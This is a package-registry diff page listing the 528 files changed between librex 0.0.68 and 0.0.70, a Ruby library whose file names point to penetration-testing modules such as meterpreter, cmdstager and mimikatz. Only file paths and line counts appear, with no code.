RubyGems - librex - Versions diffs - 0.0.68 → 0.0.70 - Mend

librex 0.0.68 → 0.0.70

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (528) hide show

checksums.yaml +15 -0
data/README.markdown +1 -1
data/Rakefile +18 -16
data/lib/rex.rb +14 -10
data/lib/rex/LICENSE +2 -2
data/lib/rex/arch.rb +76 -76
data/lib/rex/arch/sparc.rb +57 -58
data/lib/rex/arch/x86.rb +506 -496
data/lib/rex/assembly/nasm.rb +83 -84
data/lib/rex/compat.rb +228 -173
data/lib/rex/constants.rb +47 -37
data/lib/rex/elfparsey.rb +0 -3
data/lib/rex/elfparsey/elf.rb +107 -110
data/lib/rex/elfparsey/elfbase.rb +244 -247
data/lib/rex/elfparsey/exceptions.rb +0 -3
data/lib/rex/elfscan.rb +0 -3
data/lib/rex/elfscan/scanner.rb +184 -166
data/lib/rex/elfscan/search.rb +35 -38
data/lib/rex/encoder/alpha2.rb +1 -2
data/lib/rex/encoder/alpha2/alpha_mixed.rb +52 -53
data/lib/rex/encoder/alpha2/alpha_upper.rb +62 -63
data/lib/rex/encoder/alpha2/generic.rb +77 -78
data/lib/rex/encoder/alpha2/unicode_mixed.rb +101 -97
data/lib/rex/encoder/alpha2/unicode_upper.rb +106 -107
data/lib/rex/encoder/bloxor/bloxor.rb +326 -0
data/lib/rex/encoder/ndr.rb +68 -68
data/lib/rex/encoder/nonalpha.rb +50 -51
data/lib/rex/encoder/nonupper.rb +50 -51
data/lib/rex/encoder/xdr.rb +78 -78
data/lib/rex/encoder/xor.rb +52 -53
data/lib/rex/encoder/xor/dword.rb +1 -2
data/lib/rex/encoder/xor/dword_additive.rb +1 -2
data/lib/rex/encoders/xor_dword.rb +17 -18
data/lib/rex/encoders/xor_dword_additive.rb +35 -36
data/lib/rex/encoding/xor.rb +0 -1
data/lib/rex/encoding/xor/byte.rb +3 -4
data/lib/rex/encoding/xor/dword.rb +3 -4
data/lib/rex/encoding/xor/dword_additive.rb +72 -73
data/lib/rex/encoding/xor/exceptions.rb +2 -3
data/lib/rex/encoding/xor/generic.rb +129 -130
data/lib/rex/encoding/xor/qword.rb +3 -4
data/lib/rex/encoding/xor/word.rb +3 -4
data/lib/rex/exceptions.rb +100 -101
data/lib/rex/exploitation/cmdstager.rb +3 -3
data/lib/rex/exploitation/cmdstager/base.rb +170 -156
data/lib/rex/exploitation/cmdstager/bourne.rb +105 -0
data/lib/rex/exploitation/cmdstager/debug_asm.rb +110 -113
data/lib/rex/exploitation/cmdstager/debug_write.rb +106 -109
data/lib/rex/exploitation/cmdstager/echo.rb +164 -0
data/lib/rex/exploitation/cmdstager/printf.rb +122 -0
data/lib/rex/exploitation/cmdstager/tftp.rb +34 -27
data/lib/rex/exploitation/cmdstager/vbs.rb +95 -98
data/lib/rex/exploitation/egghunter.rb +359 -346
data/lib/rex/exploitation/encryptjs.rb +60 -60
data/lib/rex/exploitation/heaplib.rb +76 -76
data/lib/rex/exploitation/js.rb +6 -0
data/lib/rex/exploitation/js/detect.rb +69 -0
data/lib/rex/exploitation/js/memory.rb +81 -0
data/lib/rex/exploitation/js/network.rb +84 -0
data/lib/rex/exploitation/js/utils.rb +33 -0
data/lib/rex/exploitation/jsobfu.rb +448 -424
data/lib/rex/exploitation/obfuscatejs.rb +301 -301
data/lib/rex/exploitation/omelet.rb +257 -257
data/lib/rex/exploitation/opcodedb.rb +699 -699
data/lib/rex/exploitation/ropdb.rb +189 -0
data/lib/rex/exploitation/seh.rb +68 -68
data/lib/rex/file.rb +96 -49
data/lib/rex/image_source.rb +0 -3
data/lib/rex/image_source/disk.rb +45 -48
data/lib/rex/image_source/image_source.rb +33 -36
data/lib/rex/image_source/memory.rb +17 -20
data/lib/rex/io/bidirectional_pipe.rb +118 -115
data/lib/rex/io/datagram_abstraction.rb +13 -14
data/lib/rex/io/ring_buffer.rb +273 -273
data/lib/rex/io/stream.rb +284 -284
data/lib/rex/io/stream_abstraction.rb +183 -181
data/lib/rex/io/stream_server.rb +193 -193
data/lib/rex/job_container.rb +167 -167
data/lib/rex/logging.rb +0 -1
data/lib/rex/logging/log_dispatcher.rb +113 -113
data/lib/rex/logging/log_sink.rb +17 -17
data/lib/rex/logging/sinks/flatfile.rb +36 -36
data/lib/rex/logging/sinks/stderr.rb +27 -27
data/lib/rex/mac_oui.rb +16572 -16571
data/lib/rex/machparsey.rb +0 -1
data/lib/rex/machparsey/exceptions.rb +0 -1
data/lib/rex/machparsey/mach.rb +160 -161
data/lib/rex/machparsey/machbase.rb +367 -368
data/lib/rex/machscan.rb +0 -1
data/lib/rex/machscan/scanner.rb +175 -176
data/lib/rex/mime/encoding.rb +17 -0
data/lib/rex/mime/header.rb +58 -58
data/lib/rex/mime/message.rb +140 -137
data/lib/rex/mime/part.rb +41 -12
data/lib/rex/nop/opty2.rb +90 -90
data/lib/rex/nop/opty2_tables.rb +273 -273
data/lib/rex/ole.rb +0 -4
data/lib/rex/ole/clsid.rb +26 -30
data/lib/rex/ole/difat.rb +121 -125
data/lib/rex/ole/directory.rb +205 -209
data/lib/rex/ole/direntry.rb +217 -221
data/lib/rex/ole/fat.rb +79 -83
data/lib/rex/ole/header.rb +178 -182
data/lib/rex/ole/minifat.rb +49 -53
data/lib/rex/ole/propset.rb +113 -117
data/lib/rex/ole/samples/create_ole.rb +8 -9
data/lib/rex/ole/samples/dir.rb +10 -11
data/lib/rex/ole/samples/dump_stream.rb +14 -15
data/lib/rex/ole/samples/ole_info.rb +5 -6
data/lib/rex/ole/storage.rb +372 -376
data/lib/rex/ole/stream.rb +33 -37
data/lib/rex/ole/substorage.rb +20 -24
data/lib/rex/ole/util.rb +137 -141
data/lib/rex/parser/acunetix_nokogiri.rb +398 -398
data/lib/rex/parser/apple_backup_manifestdb.rb +116 -116
data/lib/rex/parser/appscan_nokogiri.rb +359 -359
data/lib/rex/parser/arguments.rb +88 -88
data/lib/rex/parser/burp_session_nokogiri.rb +258 -258
data/lib/rex/parser/ci_nokogiri.rb +184 -184
data/lib/rex/parser/foundstone_nokogiri.rb +334 -333
data/lib/rex/parser/fusionvm_nokogiri.rb +94 -94
data/lib/rex/parser/ini.rb +167 -167
data/lib/rex/parser/ip360_aspl_xml.rb +84 -84
data/lib/rex/parser/ip360_xml.rb +77 -77
data/lib/rex/parser/mbsa_nokogiri.rb +224 -224
data/lib/rex/parser/nessus_xml.rb +100 -100
data/lib/rex/parser/netsparker_xml.rb +89 -75
data/lib/rex/parser/nexpose_raw_nokogiri.rb +677 -677
data/lib/rex/parser/nexpose_simple_nokogiri.rb +322 -322
data/lib/rex/parser/nexpose_xml.rb +105 -105
data/lib/rex/parser/nmap_nokogiri.rb +386 -386
data/lib/rex/parser/nmap_xml.rb +116 -116
data/lib/rex/parser/nokogiri_doc_mixin.rb +223 -221
data/lib/rex/parser/openvas_nokogiri.rb +162 -162
data/lib/rex/parser/outpost24_nokogiri.rb +239 -0
data/lib/rex/parser/retina_xml.rb +90 -90
data/lib/rex/parser/unattend.rb +171 -0
data/lib/rex/parser/wapiti_nokogiri.rb +89 -89
data/lib/rex/payloads/win32/common.rb +14 -14
data/lib/rex/payloads/win32/kernel.rb +36 -36
data/lib/rex/payloads/win32/kernel/common.rb +32 -32
data/lib/rex/payloads/win32/kernel/recovery.rb +27 -27
data/lib/rex/payloads/win32/kernel/stager.rb +170 -170
data/lib/rex/peparsey.rb +0 -3
data/lib/rex/peparsey/exceptions.rb +0 -3
data/lib/rex/peparsey/pe.rb +196 -199
data/lib/rex/peparsey/pe_memdump.rb +35 -38
data/lib/rex/peparsey/pebase.rb +1633 -1652
data/lib/rex/peparsey/section.rb +115 -124
data/lib/rex/pescan.rb +0 -3
data/lib/rex/pescan/analyze.rb +351 -351
data/lib/rex/pescan/scanner.rb +182 -182
data/lib/rex/pescan/search.rb +59 -59
data/lib/rex/platforms/windows.rb +37 -37
data/lib/rex/poly.rb +111 -110
data/lib/rex/poly/block.rb +419 -417
data/lib/rex/poly/machine.rb +12 -0
data/lib/rex/poly/machine/machine.rb +829 -0
data/lib/rex/poly/machine/x86.rb +508 -0
data/lib/rex/poly/register.rb +70 -70
data/lib/rex/poly/register/x86.rb +22 -22
data/lib/rex/post.rb +0 -1
data/lib/rex/post/dir.rb +35 -36
data/lib/rex/post/file.rb +140 -141
data/lib/rex/post/file_stat.rb +198 -199
data/lib/rex/post/io.rb +167 -168
data/lib/rex/post/meterpreter.rb +1 -1
data/lib/rex/post/meterpreter/channel.rb +389 -390
data/lib/rex/post/meterpreter/channel_container.rb +33 -34
data/lib/rex/post/meterpreter/channels/pool.rb +129 -130
data/lib/rex/post/meterpreter/channels/pools/file.rb +35 -36
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +72 -73
data/lib/rex/post/meterpreter/channels/stream.rb +62 -63
data/lib/rex/post/meterpreter/client.rb +442 -436
data/lib/rex/post/meterpreter/client_core.rb +326 -310
data/lib/rex/post/meterpreter/dependencies.rb +0 -1
data/lib/rex/post/meterpreter/extension.rb +12 -13
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +35 -36
data/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +71 -0
data/lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb +169 -0
data/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +45 -0
data/lib/rex/post/meterpreter/extensions/extapi/service/service.rb +104 -0
data/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +77 -0
data/lib/rex/post/meterpreter/extensions/extapi/window/window.rb +56 -0
data/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +75 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +70 -71
data/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +361 -0
data/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +76 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb +78 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb +22 -78
data/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb +49 -0
data/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb +4 -4
data/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb +128 -0
data/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +38 -39
data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +1 -1
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +95 -96
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +39 -40
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +80 -85
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +94 -95
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +207 -147
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +258 -259
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +366 -301
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +72 -73
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +24 -25
data/lib/rex/post/meterpreter/extensions/stdapi/net/arp.rb +59 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +227 -149
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +107 -108
data/lib/rex/post/meterpreter/extensions/stdapi/net/netstat.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/resolve.rb +106 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +41 -42
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +102 -101
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +151 -152
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +142 -142
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +185 -185
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +38118 -38117
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +7 -7
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +2086 -2084
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_crypt32.rb +15 -15
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +80 -80
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +3835 -3833
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +84 -28
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +151 -137
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +15 -6
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +3155 -3155
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_version.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb +70 -70
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +128 -0
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +596 -596
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +310 -301
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +71 -61
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +100 -100
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb +14 -14
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb +488 -488
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +273 -264
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb +5 -5
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +240 -238
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +17 -15
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb +61 -61
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +654 -635
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +49 -49
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +103 -102
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +98 -68
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +165 -166
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +16 -17
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +34 -36
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +363 -364
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +102 -103
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +28 -29
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +303 -304
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +113 -114
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +260 -261
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +165 -166
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +69 -70
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb +160 -161
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +143 -144
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +29 -12
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +230 -231
data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +181 -44
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +12 -13
data/lib/rex/post/meterpreter/object_aliases.rb +56 -57
data/lib/rex/post/meterpreter/packet.rb +591 -592
data/lib/rex/post/meterpreter/packet_dispatcher.rb +506 -496
data/lib/rex/post/meterpreter/packet_parser.rb +72 -73
data/lib/rex/post/meterpreter/packet_response_waiter.rb +56 -57
data/lib/rex/post/meterpreter/ui/console.rb +112 -112
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +53 -53
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +911 -854
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +86 -86
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb +65 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi.rb +198 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb +444 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb +199 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/window.rb +118 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +220 -220
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +509 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks.rb +60 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp.rb +254 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp.rb +159 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb +182 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +173 -173
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +40 -40
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +75 -77
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +30 -30
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +105 -105
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +182 -182
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +37 -37
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +504 -482
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +401 -330
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +883 -581
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +296 -299
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +320 -153
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +78 -78
data/lib/rex/post/permission.rb +0 -1
data/lib/rex/post/process.rb +39 -40
data/lib/rex/post/thread.rb +41 -42
data/lib/rex/post/ui.rb +35 -36
data/lib/rex/proto/addp.rb +218 -0
data/lib/rex/proto/dcerpc/client.rb +344 -344
data/lib/rex/proto/dcerpc/exceptions.rb +128 -128
data/lib/rex/proto/dcerpc/handle.rb +32 -32
data/lib/rex/proto/dcerpc/ndr.rb +56 -56
data/lib/rex/proto/dcerpc/packet.rb +249 -245
data/lib/rex/proto/dcerpc/response.rb +170 -170
data/lib/rex/proto/dcerpc/uuid.rb +65 -65
data/lib/rex/proto/dcerpc/wdscp.rb +3 -0
data/lib/rex/proto/dcerpc/wdscp/constants.rb +89 -0
data/lib/rex/proto/dcerpc/wdscp/packet.rb +94 -0
data/lib/rex/proto/dhcp.rb +0 -1
data/lib/rex/proto/dhcp/constants.rb +0 -1
data/lib/rex/proto/dhcp/server.rb +303 -304
data/lib/rex/proto/drda/constants.rb +1 -1
data/lib/rex/proto/drda/packet.rb +186 -186
data/lib/rex/proto/drda/utils.rb +104 -104
data/lib/rex/proto/http.rb +1 -0
data/lib/rex/proto/http/client.rb +692 -820
data/lib/rex/proto/http/client_request.rb +472 -0
data/lib/rex/proto/http/handler.rb +25 -25
data/lib/rex/proto/http/handler/erb.rb +104 -104
data/lib/rex/proto/http/handler/proc.rb +37 -37
data/lib/rex/proto/http/header.rb +149 -149
data/lib/rex/proto/http/packet.rb +388 -382
data/lib/rex/proto/http/request.rb +332 -335
data/lib/rex/proto/http/response.rb +132 -72
data/lib/rex/proto/http/server.rb +348 -338
data/lib/rex/proto/iax2/call.rb +310 -310
data/lib/rex/proto/iax2/client.rb +197 -197
data/lib/rex/proto/iax2/codecs/alaw.rb +4 -4
data/lib/rex/proto/iax2/codecs/mulaw.rb +4 -4
data/lib/rex/proto/ipmi.rb +57 -0
data/lib/rex/proto/ipmi/channel_auth_reply.rb +88 -0
data/lib/rex/proto/ipmi/open_session_reply.rb +35 -0
data/lib/rex/proto/ipmi/rakp2.rb +35 -0
data/lib/rex/proto/ipmi/utils.rb +125 -0
data/lib/rex/proto/natpmp.rb +1 -5
data/lib/rex/proto/natpmp/constants.rb +4 -4
data/lib/rex/proto/natpmp/packet.rb +25 -25
data/lib/rex/proto/ntlm/base.rb +271 -271
data/lib/rex/proto/ntlm/constants.rb +61 -61
data/lib/rex/proto/ntlm/crypt.rb +348 -352
data/lib/rex/proto/ntlm/exceptions.rb +3 -3
data/lib/rex/proto/ntlm/message.rb +468 -471
data/lib/rex/proto/ntlm/utils.rb +746 -746
data/lib/rex/proto/pjl.rb +30 -0
data/lib/rex/proto/pjl/client.rb +162 -0
data/lib/rex/proto/proxy/socks4a.rb +440 -440
data/lib/rex/proto/rfb.rb +1 -8
data/lib/rex/proto/rfb/cipher.rb +46 -49
data/lib/rex/proto/rfb/client.rb +179 -182
data/lib/rex/proto/rfb/constants.rb +18 -21
data/lib/rex/proto/smb/client.rb +1954 -1843
data/lib/rex/proto/smb/constants.rb +533 -516
data/lib/rex/proto/smb/crypt.rb +21 -21
data/lib/rex/proto/smb/evasions.rb +43 -43
data/lib/rex/proto/smb/exceptions.rb +791 -791
data/lib/rex/proto/smb/simpleclient.rb +142 -286
data/lib/rex/proto/smb/simpleclient/open_file.rb +106 -0
data/lib/rex/proto/smb/simpleclient/open_pipe.rb +57 -0
data/lib/rex/proto/smb/utils.rb +81 -81
data/lib/rex/proto/sunrpc/client.rb +158 -158
data/lib/rex/proto/tftp.rb +0 -1
data/lib/rex/proto/tftp/client.rb +289 -289
data/lib/rex/proto/tftp/constants.rb +9 -10
data/lib/rex/proto/tftp/server.rb +466 -467
data/lib/rex/random_identifier_generator.rb +176 -0
data/lib/rex/registry.rb +1 -1
data/lib/rex/registry/hive.rb +88 -88
data/lib/rex/registry/lfkey.rb +25 -25
data/lib/rex/registry/nodekey.rb +30 -30
data/lib/rex/registry/regf.rb +10 -10
data/lib/rex/registry/valuekey.rb +43 -43
data/lib/rex/registry/valuelist.rb +13 -13
data/lib/rex/ropbuilder/rop.rb +254 -253
data/lib/rex/script.rb +21 -22
data/lib/rex/script/base.rb +51 -50
data/lib/rex/script/meterpreter.rb +2 -2
data/lib/rex/service.rb +24 -24
data/lib/rex/service_manager.rb +132 -132
data/lib/rex/services/local_relay.rb +398 -398
data/lib/rex/socket.rb +758 -763
data/lib/rex/socket/comm.rb +95 -95
data/lib/rex/socket/comm/local.rb +507 -440
data/lib/rex/socket/ip.rb +118 -118
data/lib/rex/socket/parameters.rb +351 -350
data/lib/rex/socket/range_walker.rb +445 -368
data/lib/rex/socket/ssl_tcp.rb +323 -317
data/lib/rex/socket/ssl_tcp_server.rb +173 -158
data/lib/rex/socket/subnet_walker.rb +48 -48
data/lib/rex/socket/switch_board.rb +259 -259
data/lib/rex/socket/tcp.rb +58 -56
data/lib/rex/socket/tcp_server.rb +42 -42
data/lib/rex/socket/udp.rb +152 -152
data/lib/rex/sslscan/result.rb +200 -0
data/lib/rex/sslscan/scanner.rb +205 -0
data/lib/rex/struct2.rb +0 -1
data/lib/rex/struct2/c_struct.rb +162 -163
data/lib/rex/struct2/c_struct_template.rb +21 -22
data/lib/rex/struct2/constant.rb +6 -7
data/lib/rex/struct2/element.rb +30 -31
data/lib/rex/struct2/generic.rb +60 -61
data/lib/rex/struct2/restraint.rb +40 -41
data/lib/rex/struct2/s_string.rb +60 -61
data/lib/rex/struct2/s_struct.rb +97 -98
data/lib/rex/sync.rb +0 -1
data/lib/rex/sync/event.rb +62 -72
data/lib/rex/sync/read_write_lock.rb +149 -149
data/lib/rex/sync/ref.rb +42 -42
data/lib/rex/sync/thread_safe.rb +59 -59
data/lib/rex/text.rb +1803 -1315
data/lib/rex/thread_factory.rb +25 -25
data/lib/rex/time.rb +44 -44
data/lib/rex/transformer.rb +91 -91
data/lib/rex/ui/interactive.rb +265 -265
data/lib/rex/ui/output.rb +66 -60
data/lib/rex/ui/progress_tracker.rb +79 -79
data/lib/rex/ui/subscriber.rb +144 -134
data/lib/rex/ui/text/color.rb +76 -76
data/lib/rex/ui/text/dispatcher_shell.rb +512 -505
data/lib/rex/ui/text/input.rb +96 -96
data/lib/rex/ui/text/input/buffer.rb +58 -58
data/lib/rex/ui/text/input/readline.rb +114 -114
data/lib/rex/ui/text/input/socket.rb +77 -77
data/lib/rex/ui/text/input/stdio.rb +24 -24
data/lib/rex/ui/text/irb_shell.rb +45 -41
data/lib/rex/ui/text/output.rb +64 -60
data/lib/rex/ui/text/output/buffer.rb +42 -42
data/lib/rex/ui/text/output/buffer/stdout.rb +25 -0
data/lib/rex/ui/text/output/file.rb +24 -24
data/lib/rex/ui/text/output/socket.rb +24 -24
data/lib/rex/ui/text/output/stdio.rb +29 -29
data/lib/rex/ui/text/output/tee.rb +36 -36
data/lib/rex/ui/text/progress_tracker.rb +37 -37
data/lib/rex/ui/text/shell.rb +371 -361
data/lib/rex/ui/text/table.rb +320 -284
data/lib/rex/zip.rb +0 -1
data/lib/rex/zip/archive.rb +115 -94
data/lib/rex/zip/blocks.rb +101 -100
data/lib/rex/zip/entry.rb +108 -99
data/lib/rex/zip/jar.rb +261 -206
data/lib/rex/zip/samples/comment.rb +1 -2
data/lib/rex/zip/samples/mkwar.rb +12 -13
data/lib/rex/zip/samples/mkzip.rb +1 -2
data/lib/rex/zip/samples/recursive.rb +29 -30
metadata +424 -446
data/lib/rex/arch/sparc.rb.ut.rb +0 -19
data/lib/rex/arch/x86.rb.ut.rb +0 -94
data/lib/rex/assembly/nasm.rb.ut.rb +0 -23
data/lib/rex/encoder/ndr.rb.ut.rb +0 -45
data/lib/rex/encoder/xdr.rb.ut.rb +0 -30
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -13
data/lib/rex/encoding/xor.rb.ts.rb +0 -15
data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -22
data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -16
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -16
data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -121
data/lib/rex/encoding/xor/word.rb.ut.rb +0 -14
data/lib/rex/exceptions.rb.ut.rb +0 -45
data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -28
data/lib/rex/exploitation/javascriptosdetect.js +0 -1014
data/lib/rex/exploitation/javascriptosdetect.rb +0 -43
data/lib/rex/exploitation/omelet.rb.ut.rb +0 -27
data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -280
data/lib/rex/exploitation/seh.rb.ut.rb +0 -20
data/lib/rex/file.rb.ut.rb +0 -17
data/lib/rex/io/ring_buffer.rb.ut.rb +0 -135
data/lib/rex/nop/opty2.rb.ut.rb +0 -24
data/lib/rex/parser/arguments.rb.ut.rb +0 -68
data/lib/rex/parser/ini.rb.ut.rb +0 -30
data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -18
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -39
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -37
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb +0 -52
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -43
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -128
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb +0 -64
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb +0 -29
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb +0 -155
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb +0 -128
data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -124
data/lib/rex/proto.rb.ts.rb +0 -9
data/lib/rex/proto/dcerpc.rb.ts.rb +0 -10
data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -492
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -86
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -42
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -57
data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -16
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -47
data/lib/rex/proto/drda.rb.ts.rb +0 -18
data/lib/rex/proto/drda/constants.rb.ut.rb +0 -24
data/lib/rex/proto/drda/packet.rb.ut.rb +0 -110
data/lib/rex/proto/drda/utils.rb.ut.rb +0 -85
data/lib/rex/proto/http.rb.ts.rb +0 -13
data/lib/rex/proto/http/client.rb.ut.rb +0 -96
data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -22
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -25
data/lib/rex/proto/http/header.rb.ut.rb +0 -47
